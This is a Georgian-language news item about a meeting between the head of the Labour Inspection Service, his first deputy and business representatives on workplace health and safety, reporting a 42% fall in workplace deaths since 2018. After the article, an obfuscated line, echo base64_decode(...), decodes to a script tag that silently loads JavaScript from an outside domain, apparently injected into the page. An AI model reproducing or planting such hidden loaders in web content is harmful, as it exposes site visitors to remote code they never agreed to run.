celsiusi
ავერსი შნაიდერი

შრომის ინსპექციის სამსახურის უფროსი ბექა ფერაძე და მისი პირველი მოადგილე ნატო ნათენაძე ბიზნესის წარმომადგენლებსა და დარგის ექსპერტებს შეხვდნენ.

ღონისძიების მთავარი თემა დასაქმებულის სამუშაო გარემოსა და ჯანმრთელობაზე ზრუნვა იყო. შეხვედრაზე განხილული იყო შრომის ინსპექციისა და დამსაქმებელთა როლი ამ პროცესში.
 
საუბარი შრომის ინსპექციის სამსახურის საქმიანობის შედეგებსაც: 2018 წლიდან რემდე 42%ით არის შემცირებული სამუშაო ადგილზე გარდაცვლილთა რაოდენობა. ყოველწლიურად რამდენჯერმე იზრდება ინსპექტირებების რაოდენობა როგორც უსაფრთხოების ისე უფლებების მიმართულებით.
 
შეხვედრა ინვესტორთა საბჭოს თანამონაწილეობით ჩატარდა. მსგავსი შეხვედრები ხელს უწყობს როგორც ბიზნეს ასოციაციების თანამშრომლობის გაძლიერებას, ასევე საჯარო-კერძო სექტორს შორის დიალოგის გაუმჯობესებას, რომელიც საბოლოო ჯამში ეფექტურ შედეგებს იძლევა როგორც ბიზნეს გარემოს, ასევე დასაქმებულთა შრომითი უფლებების დაცვის კუთხით.

171
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");